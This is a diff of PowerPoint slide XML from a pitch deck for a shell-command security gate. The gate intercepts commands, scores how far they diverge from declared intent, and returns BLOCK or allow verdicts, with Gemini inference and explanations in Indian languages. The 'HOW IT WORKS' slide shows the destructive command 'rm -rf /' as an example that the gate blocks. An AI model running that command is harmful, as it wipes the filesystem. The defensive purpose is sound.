-            <a:ext cx="2743200" cy="274320"/>
+            <a:off x="548640" y="1554480"/>
+            <a:ext cx="8046720" cy="1877437"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -9476,256 +9996,297 @@
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1300" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>2. SCORE</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="2743200"/>
-            <a:ext cx="3840480" cy="1371600"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Sequence_Surprise (0.25): 0.92</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>Context_Mismatch (0.20): 0.85</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>Semantic_Inconsistency (0.30): 0.98</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>Behavioral_Deviation (0.25): 0.88</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>━━━━━━━━━━━━━━━━━━━</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>Composite: 0.92</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4754880" y="1051560"/>
-            <a:ext cx="2743200" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1300" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>3. DECIDE</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
-          <p:cNvSpPr/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4754880" y="1371600"/>
-            <a:ext cx="4023360" cy="822960"/>
-          </a:xfrm>
-          <a:prstGeom prst="roundRect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:solidFill>
-            <a:srgbClr val="1E1E2E"/>
-          </a:solidFill>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:style>
-          <a:lnRef idx="1">
-            <a:schemeClr val="accent1"/>
-          </a:lnRef>
-          <a:fillRef idx="3">
-            <a:schemeClr val="accent1"/>
-          </a:fillRef>
-          <a:effectRef idx="2">
-            <a:schemeClr val="accent1"/>
-          </a:effectRef>
-          <a:fontRef idx="minor">
-            <a:schemeClr val="lt1"/>
-          </a:fontRef>
-        </p:style>
-        <p:txBody>
-          <a:bodyPr wrap="square" lIns="127000" tIns="76200" rtlCol="0" anchor="ctr"/>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:spcBef>
-                <a:spcPts val="100"/>
-              </a:spcBef>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
-              </a:rPr>
-              <a:t>{"action": "BLOCK",</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
             <a:pPr>
               <a:spcBef>
-                <a:spcPts val="100"/>
+                <a:spcPts val="600"/>
               </a:spcBef>
             </a:pPr>
             <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
               </a:rPr>
-              <a:t> "score": 0.92,</a:t>
+              <a:t>→  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>Pre-execution blocking gate — Shell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> h</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>ook on Unix domain socket</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr>
               <a:spcBef>
-                <a:spcPts val="100"/>
+                <a:spcPts val="600"/>
               </a:spcBef>
             </a:pPr>
             <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
               </a:rPr>
-              <a:t> "reasoning": "Diverges from</a:t>
+              <a:t>→  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>4-component divergence scoring — Sequence</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> s</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>urprise, Context</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> mi</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>smatch, Semantic</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> i</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>nconsistency, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>	</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>Behavioral</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>eviation</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr>
               <a:spcBef>
-                <a:spcPts val="100"/>
+                <a:spcPts val="600"/>
               </a:spcBef>
             </a:pPr>
             <a:r>
-              <a:rPr sz="900">
-                <a:solidFill>
-                  <a:srgbClr val="A0E0A0"/>
-                </a:solidFill>
-                <a:latin typeface="Menlo"/>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
               </a:rPr>
-              <a:t>  declared intent..."}</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4754880" y="2468880"/>
-            <a:ext cx="4023360" cy="1828800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="707088"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Shell blocks → Engine scores → Verdict</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>All within 2-second budget</a:t>
-            </a:r>
-            <a:br/>
-            <a:r>
-              <a:t>Gemini timeout → exclude → renormalize</a:t>
+              <a:t>→  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>All inference local — Gemini, zero data leaves Indian networks</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="600"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>→  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>Deterministic scoring — same inputs always produce same composite</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="600"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>→  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>2-second decision budget with graceful LLM degradation</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="600"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>→  </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>11 Indian-language explainability —</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t>Tamil,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> Kannada, Hindi,</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr sz="1300" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:rPr>
+              <a:t> Bengali, Telugu...</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -9794,6 +10355,535 @@
               </a:defRPr>
             </a:pPr>
             <a:r>
+              <a:t>HOW IT WORKS</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Rectangle 2"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="868680"/>
+            <a:ext cx="1828800" cy="38100"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="00D4AA"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="TextBox 3"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="1051560"/>
+            <a:ext cx="2743200" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1300" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>1. INTERCEPT</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="5" name="Rounded Rectangle 4"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="1371600"/>
+            <a:ext cx="3840480" cy="914400"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="1E1E2E"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="127000" tIns="76200" rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t>{"commandText": "rm -rf /",</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t> "userId": "rachit",</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t> "actorType": "HUMAN",</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t> "inputOrigin": "TYPED"}</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="6" name="TextBox 5"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="2468880"/>
+            <a:ext cx="2743200" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1300" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>2. SCORE</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="7" name="TextBox 6"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="2743200"/>
+            <a:ext cx="3840480" cy="1371600"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1000" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="B0B0C0"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Sequence_Surprise (0.25): 0.92</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:t>Context_Mismatch (0.20): 0.85</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:t>Semantic_Inconsistency (0.30): 0.98</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:t>Behavioral_Deviation (0.25): 0.88</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:t>━━━━━━━━━━━━━━━━━━━</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:t>Composite: 0.92</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="8" name="TextBox 7"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4754880" y="1051560"/>
+            <a:ext cx="2743200" cy="274320"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1300" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="00D4AA"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>3. DECIDE</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
+          <p:cNvSpPr/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4754880" y="1371600"/>
+            <a:ext cx="4023360" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="roundRect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:solidFill>
+            <a:srgbClr val="1E1E2E"/>
+          </a:solidFill>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:lnRef>
+          <a:fillRef idx="3">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="2">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr wrap="square" lIns="127000" tIns="76200" rtlCol="0" anchor="ctr"/>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="ctr">
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t>{"action": "BLOCK",</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t> "score": 0.92,</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t> "reasoning": "Diverges from</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcBef>
+                <a:spcPts val="100"/>
+              </a:spcBef>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="900">
+                <a:solidFill>
+                  <a:srgbClr val="A0E0A0"/>
+                </a:solidFill>
+                <a:latin typeface="Menlo"/>
+              </a:rPr>
+              <a:t>  declared intent..."}</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="10" name="TextBox 9"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4754880" y="2468880"/>
+            <a:ext cx="4023360" cy="1828800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="1100" b="0">
+                <a:solidFill>
+                  <a:srgbClr val="707088"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
+              <a:t>Shell blocks → Engine scores → Verdict</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:t>All within 2-second budget</a:t>
+            </a:r>
+            <a:br/>
+            <a:r>
+              <a:t>Gemini timeout → exclude → renormalize</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
+        <a:solidFill>
+          <a:srgbClr val="141428"/>
+        </a:solidFill>
+        <a:effectLst/>
+      </p:bgPr>
+    </p:bg>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="548640" y="274320"/>
+            <a:ext cx="7772400" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr algn="l">
+              <a:defRPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="F8F8F8"/>
+                </a:solidFill>
+                <a:latin typeface="Helvetica Neue"/>
+              </a:defRPr>
+            </a:pPr>
+            <a:r>
               <a:t>ARCHITECTURE</a:t>
             </a:r>
           </a:p>
@@ -10385,225 +11475,6 @@
           <a:xfrm>
             <a:off x="0" y="0"/>
             <a:ext cx="9144000" cy="5342880"/>
-          </a:xfrm>
